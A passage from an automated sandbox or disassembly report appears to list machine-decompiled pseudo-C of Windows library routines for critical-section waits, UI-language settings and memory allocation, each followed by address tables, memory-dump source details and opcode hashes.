                                                              																					_t130 = E04BCFD9B(_t177, 0, 4);
                                                              																					__eflags = _t130;
                                                              																					if(_t130 != 0) {
                                                              																						goto L42;
                                                              																					} else {
                                                              																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                              																						_t91 =  *(_t177 + 0x20);
                                                              																						goto L26;
                                                              																					}
                                                              																				}
                                                              																				goto L35;
                                                              																			} else {
                                                              																				L26:
                                                              																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                              																				__eflags = _t94;
                                                              																				L27:
                                                              																				 *(_t177 + 0x20) = _t94;
                                                              																				__eflags = _t170 & 0x00008000;
                                                              																				if((_t170 & 0x00008000) != 0) {
                                                              																					_t95 = _a12;
                                                              																					__eflags = _t95;
                                                              																					if(_t95 != 0) {
                                                              																						_t96 =  *_t95;
                                                              																						__eflags = _t96;
                                                              																						if(_t96 != 0) {
                                                              																							 *((short*)(_t177 + 0x22)) = 0;
                                                              																							_t40 = _t177 + 0x20;
                                                              																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                              																							__eflags =  *_t40;
                                                              																						}
                                                              																					}
                                                              																				}
                                                              																				goto L31;
                                                              																			}
                                                              																		}
                                                              																	}
                                                              																}
                                                              															}
                                                              														}
                                                              													} else {
                                                              														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                              														_t106 =  *(_t147 + 0x20);
                                                              														__eflags = _t106 & 0x00000040;
                                                              														if((_t106 & 0x00000040) != 0) {
                                                              															_t147 = E04BCFD22(_t147);
                                                              															__eflags = _t147;
                                                              															if(_t147 == 0) {
                                                              																L41:
                                                              																_t130 = 0xc0000001;
                                                              																L32:
                                                              																_t77 = _t130;
                                                              																goto L33;
                                                              															} else {
                                                              																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                              																_t106 =  *(_t147 + 0x20);
                                                              																goto L17;
                                                              															}
                                                              															goto L35;
                                                              														} else {
                                                              															L17:
                                                              															_t108 = _t106 | 0x00000080;
                                                              															__eflags = _t108;
                                                              															 *(_t147 + 0x20) = _t108;
                                                              															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                              															goto L18;
                                                              														}
                                                              													}
                                                              												}
                                                              											}
                                                              											L33:
                                                              										}
                                                              									}
                                                              								}
                                                              							}
                                                              						}
                                                              						L35:
                                                              						return _t77;
                                                              					} else {
                                                              						 *_t75 = 0x4c87b80;
                                                              						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                              						 *_t134 = _t75;
                                                              						 *0x4c87b84 = _t75;
                                                              						_t73 = E04BAEB70(_t134, 0x4c87b60);
                                                              						if( *0x4c87b20 != 0) {
                                                              							_t73 =  *( *[fs:0x30] + 0xc);
                                                              							if( *((char*)(_t73 + 0x28)) == 0) {
                                                              								_t73 = E04BAFF60( *0x4c87b20);
                                                              							}
                                                              						}
                                                              						goto L5;
                                                              					}
                                                              				}
                                                              			}

















































                                                              0x04c0be25
                                                              0x04c0be27
                                                              0x04c0be35
                                                              0x04c0be39
                                                              0x04c0be46
                                                              0x04c0be4f
                                                              0x04c0be54
                                                              0x04c0be56
                                                              0x04c0bef8
                                                              0x04c0bef8
                                                              0x00000000
                                                              0x04c0be5c
                                                              0x04c0be5c
                                                              0x04c0be60
                                                              0x00000000
                                                              0x04c0be66
                                                              0x04c0be66
                                                              0x04c0be7f
                                                              0x04c0be84
                                                              0x04c0be87
                                                              0x04c0be89
                                                              0x04c0be8b
                                                              0x04c0be99
                                                              0x04c0be9d
                                                              0x04c0bea0
                                                              0x04c0beac
                                                              0x04c0beaf
                                                              0x04c0beb1
                                                              0x04c0beb3
                                                              0x04c0beb3
                                                              0x00000000
                                                              0x04c0bea2
                                                              0x04c0bea2
                                                              0x00000000
                                                              0x04c0bea2
                                                              0x04c0be8d
                                                              0x04c0be8d
                                                              0x04c0be92
                                                              0x00000000
                                                              0x04c0be92
                                                              0x04c0be8b
                                                              0x04c0be60
                                                              0x04c0be3b
                                                              0x04c0be3b
                                                              0x04c0be3e
                                                              0x00000000
                                                              0x04c0be40
                                                              0x04c0be40
                                                              0x04c0be44
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04c0be44
                                                              0x04c0be3e
                                                              0x04c0be29
                                                              0x04c0be29
                                                              0x00000000
                                                              0x04c0be29
                                                              0x04c0be27
                                                              0x00000000
                                                              0x04bcfba7
                                                              0x04bcfba7
                                                              0x04bcfbab
                                                              0x04c0bf02
                                                              0x04bcfbb1
                                                              0x04bcfbb1
                                                              0x04bcfbb8
                                                              0x04bcfbbd
                                                              0x04bcfbbd
                                                              0x04bcfbbf
                                                              0x04bcfbbf
                                                              0x04bcfbc5
                                                              0x04bcfbcb
                                                              0x04bcfbf8
                                                              0x04bcfbf8
                                                              0x04bcfbfa
                                                              0x00000000
                                                              0x04bcfc00
                                                              0x04bcfc00
                                                              0x04bcfc03
                                                              0x00000000
                                                              0x04bcfc09
                                                              0x04bcfc09
                                                              0x04bcfc0f
                                                              0x04bcfc15
                                                              0x04bcfc23
                                                              0x04bcfc23
                                                              0x04bcfc25
                                                              0x04bcfc27
                                                              0x04bcfc75
                                                              0x04bcfc7c
                                                              0x04bcfc84
                                                              0x00000000
                                                              0x04bcfc29
                                                              0x04bcfc29
                                                              0x04bcfc2d
                                                              0x04bcfc30
                                                              0x04c0bf0f
                                                              0x00000000
                                                              0x04bcfc36
                                                              0x04bcfc38
                                                              0x04bcfc3b
                                                              0x04bcfc41
                                                              0x04c0bf17
                                                              0x04c0bf19
                                                              0x04c0bf48
                                                              0x04c0bf4b
                                                              0x00000000
                                                              0x04c0bf1b
                                                              0x04c0bf22
                                                              0x04c0bf24
                                                              0x04c0bf26
                                                              0x00000000
                                                              0x04c0bf2c
                                                              0x04c0bf37
                                                              0x04c0bf39
                                                              0x04c0bf3b
                                                              0x00000000
                                                              0x04c0bf41
                                                              0x04c0bf41
                                                              0x04c0bf41
                                                              0x04c0bf41
                                                              0x04c0bf45
                                                              0x00000000
                                                              0x04c0bf45
                                                              0x04c0bf3b
                                                              0x04c0bf26
                                                              0x00000000
                                                              0x04bcfc47
                                                              0x04bcfc47
                                                              0x04bcfc49
                                                              0x04bcfcb2
                                                              0x04bcfcb4
                                                              0x04bcfcb6
                                                              0x04bcfcdc
                                                              0x04bcfcdc
                                                              0x00000000
                                                              0x04bcfcb8
                                                              0x04bcfcc3
                                                              0x04bcfcc5
                                                              0x04bcfcc7
                                                              0x00000000
                                                              0x04bcfcc9
                                                              0x04bcfcc9
                                                              0x04bcfccd
                                                              0x00000000
                                                              0x04bcfccd
                                                              0x04bcfcc7
                                                              0x00000000
                                                              0x04bcfc4b
                                                              0x04bcfc4b
                                                              0x04bcfc4e
                                                              0x04bcfc4e
                                                              0x04bcfc51
                                                              0x04bcfc51
                                                              0x04bcfc54
                                                              0x04bcfc5a
                                                              0x04bcfc5c
                                                              0x04bcfc5f
                                                              0x04bcfc61
                                                              0x04bcfc63
                                                              0x04bcfc65
                                                              0x04bcfc67
                                                              0x04bcfc6e
                                                              0x04bcfc72
                                                              0x04bcfc72
                                                              0x04bcfc72
                                                              0x04bcfc72
                                                              0x04bcfc67
                                                              0x04bcfc61
                                                              0x00000000
                                                              0x04bcfc5a
                                                              0x04bcfc49
                                                              0x04bcfc41
                                                              0x04bcfc30
                                                              0x04bcfc27
                                                              0x04bcfc03
                                                              0x04bcfbcd
                                                              0x04bcfbd3
                                                              0x04bcfbd9
                                                              0x04bcfbdc
                                                              0x04bcfbde
                                                              0x04bcfc99
                                                              0x04bcfc9b
                                                              0x04bcfc9d
                                                              0x04bcfcd5
                                                              0x04bcfcd5
                                                              0x04bcfc89
                                                              0x04bcfc89
                                                              0x00000000
                                                              0x04bcfc9f
                                                              0x04bcfc9f
                                                              0x04bcfca3
                                                              0x00000000
                                                              0x04bcfca3
                                                              0x00000000
                                                              0x04bcfbe4
                                                              0x04bcfbe4
                                                              0x04bcfbe4
                                                              0x04bcfbe4
                                                              0x04bcfbe9
                                                              0x04bcfbf2
                                                              0x00000000
                                                              0x04bcfbf2
                                                              0x04bcfbde
                                                              0x04bcfbcb
                                                              0x04bcfbab
                                                              0x04bcfc8b
                                                              0x04bcfc8b
                                                              0x04bcfc8c
                                                              0x04bcfb80
                                                              0x04bcfb72
                                                              0x04bcfb5e
                                                              0x04bcfc8d
                                                              0x04bcfc91
                                                              0x04bcfadf
                                                              0x04bcfadf
                                                              0x04bcfae1
                                                              0x04bcfae4
                                                              0x04bcfae7
                                                              0x04bcfaec
                                                              0x04bcfaf8
                                                              0x04bcfb00
                                                              0x04bcfb07
                                                              0x04bcfb0f
                                                              0x04bcfb0f
                                                              0x04bcfb07
                                                              0x00000000
                                                              0x04bcfaf8
                                                              0x04bcfadd

                                                              Strings
                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04C0BE0F
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                              • API String ID: 0-865735534
                                                              • Opcode ID: 64f1f2af627d0d6eb5373212277418ee97c03b46a89e379f9da1cf2852273678
                                                              • Instruction ID: 85a7aaf407cef911d31f770b54023e9ed5f4aa65f00ef3e58914c5597ab4f253
                                                              • Opcode Fuzzy Hash: 64f1f2af627d0d6eb5373212277418ee97c03b46a89e379f9da1cf2852273678
                                                              • Instruction Fuzzy Hash: 2DA1C471B006069BEB25DFA4C490B7AB3A7EB44714F0485EDE856DB6C0EB34FD418B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 63%
                                                              			E04B92D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                              				signed char _v8;
                                                              				signed int _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				signed int _v52;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr _t55;
                                                              				signed int _t57;
                                                              				signed int _t58;
                                                              				char* _t62;
                                                              				signed char* _t63;
                                                              				signed char* _t64;
                                                              				signed int _t67;
                                                              				signed int _t72;
                                                              				signed int _t77;
                                                              				signed int _t78;
                                                              				signed int _t88;
                                                              				intOrPtr _t89;
                                                              				signed char _t93;
                                                              				signed int _t97;
                                                              				signed int _t98;
                                                              				signed int _t102;
                                                              				signed int _t103;
                                                              				intOrPtr _t104;
                                                              				signed int _t105;
                                                              				signed int _t106;
                                                              				signed char _t109;
                                                              				signed int _t111;
                                                              				void* _t116;
                                                              
                                                              				_t102 = __edi;
                                                              				_t97 = __edx;
                                                              				_v12 = _v12 & 0x00000000;
                                                              				_t55 =  *[fs:0x18];
                                                              				_t109 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t86 = 0;
                                                              				_v32 = _t55;
                                                              				_v24 = 0;
                                                              				_push(__edi);
                                                              				if(__ecx == 0x4c85350) {
                                                              					_t86 = 1;
                                                              					_v24 = 1;
                                                              					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                              				}
                                                              				_t103 = _t102 | 0xffffffff;
                                                              				if( *0x4c87bc8 != 0) {
                                                              					_push(0xc000004b);
                                                              					_push(_t103);
                                                              					E04BD97C0();
                                                              				}
                                                              				if( *0x4c879c4 != 0) {
                                                              					_t57 = 0;
                                                              				} else {
                                                              					_t57 = 0x4c879c8;
                                                              				}
                                                              				_v16 = _t57;
                                                              				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                              					_t93 = _t109;
                                                              					L23();
                                                              				}
                                                              				_t58 =  *_t109;
                                                              				if(_t58 == _t103) {
                                                              					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                              					_t58 = _t103;
                                                              					if(__eflags == 0) {
                                                              						_t93 = _t109;
                                                              						E04BC1624(_t86, __eflags);
                                                              						_t58 =  *_t109;
                                                              					}
                                                              				}
                                                              				_v20 = _v20 & 0x00000000;
                                                              				if(_t58 != _t103) {
                                                              					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                              				}
                                                              				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                              				_t88 = _v16;
                                                              				_v28 = _t104;
                                                              				L9:
                                                              				while(1) {
                                                              					if(E04BB7D50() != 0) {
                                                              						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                              					} else {
                                                              						_t62 = 0x7ffe0382;
                                                              					}
                                                              					if( *_t62 != 0) {
                                                              						_t63 =  *[fs:0x30];
                                                              						__eflags = _t63[0x240] & 0x00000002;
                                                              						if((_t63[0x240] & 0x00000002) != 0) {
                                                              							_t93 = _t109;
                                                              							E04C2FE87(_t93);
                                                              						}
                                                              					}
                                                              					if(_t104 != 0xffffffff) {
                                                              						_push(_t88);
                                                              						_push(0);
                                                              						_push(_t104);
                                                              						_t64 = E04BD9520();
                                                              						goto L15;
                                                              					} else {
                                                              						while(1) {
                                                              							_t97 =  &_v8;
                                                              							_t64 = E04BCE18B(_t109 + 4, _t97, 4, _t88, 0);
                                                              							if(_t64 == 0x102) {
                                                              								break;
                                                              							}
                                                              							_t93 =  *(_t109 + 4);
                                                              							_v8 = _t93;
                                                              							if((_t93 & 0x00000002) != 0) {
                                                              								continue;
                                                              							}
                                                              							L15:
                                                              							if(_t64 == 0x102) {
                                                              								break;
                                                              							}
                                                              							_t89 = _v24;
                                                              							if(_t64 < 0) {
                                                              								L04BEDF30(_t93, _t97, _t64);
                                                              								_push(_t93);
                                                              								_t98 = _t97 | 0xffffffff;
                                                              								__eflags =  *0x4c86901;
                                                              								_push(_t109);
                                                              								_v52 = _t98;
                                                              								if( *0x4c86901 != 0) {
                                                              									_push(0);
                                                              									_push(1);
                                                              									_push(0);
                                                              									_push(0x100003);
                                                              									_push( &_v12);
                                                              									_t72 = E04BD9980();
                                                              									__eflags = _t72;
                                                              									if(_t72 < 0) {
                                                              										_v12 = _t98 | 0xffffffff;
                                                              									}
                                                              								}
                                                              								asm("lock cmpxchg [ecx], edx");
                                                              								_t111 = 0;
                                                              								__eflags = 0;
                                                              								if(0 != 0) {
                                                              									__eflags = _v12 - 0xffffffff;
                                                              									if(_v12 != 0xffffffff) {
                                                              										_push(_v12);
                                                              										E04BD95D0();
                                                              									}
                                                              								} else {
                                                              									_t111 = _v12;
                                                              								}
                                                              								return _t111;
                                                              							} else {
                                                              								if(_t89 != 0) {
                                                              									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                                              									_t77 = E04BB7D50();
                                                              									__eflags = _t77;
                                                              									if(_t77 == 0) {
                                                              										_t64 = 0x7ffe0384;
                                                              									} else {
                                                              										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              									}
                                                              									__eflags =  *_t64;
                                                              									if( *_t64 != 0) {
                                                              										_t64 =  *[fs:0x30];
                                                              										__eflags = _t64[0x240] & 0x00000004;
                                                              										if((_t64[0x240] & 0x00000004) != 0) {
                                                              											_t78 = E04BB7D50();
                                                              											__eflags = _t78;
                                                              											if(_t78 == 0) {
                                                              												_t64 = 0x7ffe0385;
                                                              											} else {
                                                              												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              											}
                                                              											__eflags =  *_t64 & 0x00000020;
                                                              											if(( *_t64 & 0x00000020) != 0) {
                                                              												_t64 = E04C17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                              											}
                                                              										}
                                                              									}
                                                              								}
                                                              								return _t64;
                                                              							}
                                                              						}
                                                              						_t97 = _t88;
                                                              						_t93 = _t109;
                                                              						E04C2FDDA(_t97, _v12);
                                                              						_t105 =  *_t109;
                                                              						_t67 = _v12 + 1;
                                                              						_v12 = _t67;
                                                              						__eflags = _t105 - 0xffffffff;
                                                              						if(_t105 == 0xffffffff) {
                                                              							_t106 = 0;
                                                              							__eflags = 0;
                                                              						} else {
                                                              							_t106 =  *(_t105 + 0x14);
                                                              						}
                                                              						__eflags = _t67 - 2;
                                                              						if(_t67 > 2) {
                                                              							__eflags = _t109 - 0x4c85350;
                                                              							if(_t109 != 0x4c85350) {
                                                              								__eflags = _t106 - _v20;
                                                              								if(__eflags == 0) {
                                                              									_t93 = _t109;
                                                              									E04C2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                              								}
                                                              							}
                                                              						}
                                                              						_push("RTL: Re-Waiting\n");
                                                              						_push(0);
                                                              						_push(0x65);
                                                              						_v20 = _t106;
                                                              						E04C25720();
                                                              						_t104 = _v28;
                                                              						_t116 = _t116 + 0xc;
                                                              						continue;
                                                              					}
                                                              				}
                                                              			}





































                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Re-Waiting
                                                              • API String ID: 0-316354757
                                                              • Opcode ID: 95ce2bee7f7819fe5340fc906ef8e65611a455249dd19f78c27803e0b8665549
                                                              • Instruction ID: 04f02df1fd813b4434d63efa2ab86cde5830a5a1d8feebe2235106e43c98642e
                                                              • Opcode Fuzzy Hash: 95ce2bee7f7819fe5340fc906ef8e65611a455249dd19f78c27803e0b8665549
                                                              • Instruction Fuzzy Hash: 5D611170E00A05BBEB25DF69C880B7E77F5EB84318F180AE9D8519B2D0DB74BD01A791
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 80%
                                                              			E04C60EA5(void* __ecx, void* __edx) {
                                                              				signed int _v20;
                                                              				char _v24;
                                                              				intOrPtr _v28;
                                                              				unsigned int _v32;
                                                              				signed int _v36;
                                                              				intOrPtr _v40;
                                                              				char _v44;
                                                              				intOrPtr _v64;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed int _t58;
                                                              				unsigned int _t60;
                                                              				intOrPtr _t62;
                                                              				char* _t67;
                                                              				char* _t69;
                                                              				void* _t80;
                                                              				void* _t83;
                                                              				intOrPtr _t93;
                                                              				intOrPtr _t115;
                                                              				char _t117;
                                                              				void* _t120;
                                                              
                                                              				_t83 = __edx;
                                                              				_t117 = 0;
                                                              				_t120 = __ecx;
                                                              				_v44 = 0;
                                                              				if(E04C5FF69(__ecx,  &_v44,  &_v32) < 0) {
                                                              					L24:
                                                              					_t109 = _v44;
                                                              					if(_v44 != 0) {
                                                              						E04C61074(_t83, _t120, _t109, _t117, _t117);
                                                              					}
                                                              					L26:
                                                              					return _t117;
                                                              				}
                                                              				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                              				_t5 = _t83 + 1; // 0x1
                                                              				_v36 = _t5 << 0xc;
                                                              				_v40 = _t93;
                                                              				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                              				asm("sbb ebx, ebx");
                                                              				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                              				if(_t58 != 0) {
                                                              					_push(0);
                                                              					_push(0x14);
                                                              					_push( &_v24);
                                                              					_push(3);
                                                              					_push(_t93);
                                                              					_push(0xffffffff);
                                                              					_t80 = E04BD9730();
                                                              					_t115 = _v64;
                                                              					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                              						_push(_t93);
                                                              						E04C5A80D(_t115, 1, _v20, _t117);
                                                              						_t83 = 4;
                                                              					}
                                                              				}
                                                              				if(E04C5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                              					goto L24;
                                                              				}
                                                              				_t60 = _v32;
                                                              				_t97 = (_t60 != 0x100000) + 1;
                                                              				_t83 = (_v44 -  *0x4c88b04 >> 0x14) + (_v44 -  *0x4c88b04 >> 0x14);
                                                              				_v28 = (_t60 != 0x100000) + 1;
                                                              				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                              				_v40 = _t62;
                                                              				if(_t83 >= _t62) {
                                                              					L10:
                                                              					asm("lock xadd [eax], ecx");
                                                              					asm("lock xadd [eax], ecx");
                                                              					if(E04BB7D50() == 0) {
                                                              						_t67 = 0x7ffe0380;
                                                              					} else {
                                                              						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              					}
                                                              					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                              						E04C5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                              					}
                                                              					if(E04BB7D50() == 0) {
                                                              						_t69 = 0x7ffe0388;
                                                              					} else {
                                                              						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              					}
                                                              					if( *_t69 != 0) {
                                                              						E04C4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                              					}
                                                              					if(( *0x4c88724 & 0x00000008) != 0) {
                                                              						E04C552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                              					}
                                                              					_t117 = _v44;
                                                              					goto L26;
                                                              				}
                                                              				while(E04C615B5(0x4c88ae4, _t83, _t97, _t97) >= 0) {
                                                              					_t97 = _v28;
                                                              					_t83 = _t83 + 2;
                                                              					if(_t83 < _v40) {
                                                              						continue;
                                                              					}
                                                              					goto L10;
                                                              				}
                                                              				goto L24;
                                                              			}

























                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `
                                                              • API String ID: 0-2679148245
                                                              • Opcode ID: a787761eb0a2e28eb1abda7141b983a25a4b85c5932ce66b485bd2e2e43472ca
                                                              • Instruction ID: 21428cd115ddb87c0cf8abc291ba0e494e857f16b11a15c9c1da0bb977e4546e
                                                              • Opcode Fuzzy Hash: a787761eb0a2e28eb1abda7141b983a25a4b85c5932ce66b485bd2e2e43472ca
                                                              • Instruction Fuzzy Hash: 65519D712043419FE724DF29D9C4B2BB7E6EBC4704F08892CF99697290DA71F945C762
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 75%
                                                              			E04BCF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                              				intOrPtr _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				char* _v20;
                                                              				intOrPtr _v24;
                                                              				char _v28;
                                                              				intOrPtr _v32;
                                                              				char _v36;
                                                              				char _v44;
                                                              				char _v52;
                                                              				intOrPtr _v56;
                                                              				char _v60;
                                                              				intOrPtr _v72;
                                                              				void* _t51;
                                                              				void* _t58;
                                                              				signed short _t82;
                                                              				short _t84;
                                                              				signed int _t91;
                                                              				signed int _t100;
                                                              				signed short* _t103;
                                                              				void* _t108;
                                                              				intOrPtr* _t109;
                                                              
                                                              				_t103 = __ecx;
                                                              				_t82 = __edx;
                                                              				_t51 = E04BB4120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                              				if(_t51 >= 0) {
                                                              					_push(0x21);
                                                              					_push(3);
                                                              					_v56 =  *0x7ffe02dc;
                                                              					_v20 =  &_v52;
                                                              					_push( &_v44);
                                                              					_v28 = 0x18;
                                                              					_push( &_v28);
                                                              					_push(0x100020);
                                                              					_v24 = 0;
                                                              					_push( &_v60);
                                                              					_v16 = 0x40;
                                                              					_v12 = 0;
                                                              					_v8 = 0;
                                                              					_t58 = E04BD9830();
                                                              					_t87 =  *[fs:0x30];
                                                              					_t108 = _t58;
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                              					if(_t108 < 0) {
                                                              						L11:
                                                              						_t51 = _t108;
                                                              					} else {
                                                              						_push(4);
                                                              						_push(8);
                                                              						_push( &_v36);
                                                              						_push( &_v44);
                                                              						_push(_v60);
                                                              						_t108 = E04BD9990();
                                                              						if(_t108 < 0) {
                                                              							L10:
                                                              							_push(_v60);
                                                              							E04BD95D0();
                                                              							goto L11;
                                                              						} else {
                                                              							_t109 = L04BB4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                              							if(_t109 == 0) {
                                                              								_t108 = 0xc0000017;
                                                              								goto L10;
                                                              							} else {
                                                              								_t21 = _t109 + 0x18; // 0x18
                                                              								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                              								 *_t109 = 1;
                                                              								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                              								 *(_t109 + 0xe) = _t82;
                                                              								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                              								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                              								E04BDF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                              								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                              								_t91 =  *_t103 & 0x0000ffff;
                                                              								_t100 = _t91 & 0xfffffffe;
                                                              								_t84 = 0x5c;
                                                              								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                              									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                              										_push(_v60);
                                                              										E04BD95D0();
                                                              										L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                              										_t51 = 0xc0000106;
                                                              									} else {
                                                              										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                              										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                              										goto L5;
                                                              									}
                                                              								} else {
                                                              									L5:
                                                              									 *_a4 = _t109;
                                                              									_t51 = 0;
                                                              								}
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              				return _t51;
                                                              			}


























                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                              • Instruction ID: a300d47beb729c9b2d7e0682d3b6537aff920768b90e630adee09ef00d52874c
                                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                              • Instruction Fuzzy Hash: 67517A71604710AFD320DF69C840A6BBBF9FF88714F008A6EF99587690E7B4E914CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 75%
                                                              			E04C13540(intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v88;
                                                              				intOrPtr _v92;
                                                              				char _v96;
                                                              				char _v352;
                                                              				char _v1072;
                                                              				intOrPtr _v1140;
                                                              				intOrPtr _v1148;
                                                              				char _v1152;
                                                              				char _v1156;
                                                              				char _v1160;
                                                              				char _v1164;
                                                              				char _v1168;
                                                              				char* _v1172;
                                                              				short _v1174;
                                                              				char _v1176;
                                                              				char _v1180;
                                                              				char _v1192;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				short _t41;
                                                              				short _t42;
                                                              				intOrPtr _t80;
                                                              				intOrPtr _t81;
                                                              				signed int _t82;
                                                              				void* _t83;
                                                              
                                                              				_v12 =  *0x4c8d360 ^ _t82;
                                                              				_t41 = 0x14;
                                                              				_v1176 = _t41;
                                                              				_t42 = 0x16;
                                                              				_v1174 = _t42;
                                                              				_v1164 = 0x100;
                                                              				_v1172 = L"BinaryHash";
                                                              				_t81 = E04BD0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                              				if(_t81 < 0) {
                                                              					L11:
                                                              					_t75 = _t81;
                                                              					E04C13706(0, _t81, _t79, _t80);
                                                              					L12:
                                                              					if(_a4 != 0xc000047f) {
                                                              						E04BDFA60( &_v1152, 0, 0x50);
                                                              						_v1152 = 0x60c201e;
                                                              						_v1148 = 1;
                                                              						_v1140 = E04C13540;
                                                              						E04BDFA60( &_v1072, 0, 0x2cc);
                                                              						_push( &_v1072);
                                                              						E04BEDDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                              						E04C20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                              						_push(_v1152);
                                                              						_push(0xffffffff);
                                                              						E04BD97C0();
                                                              					}
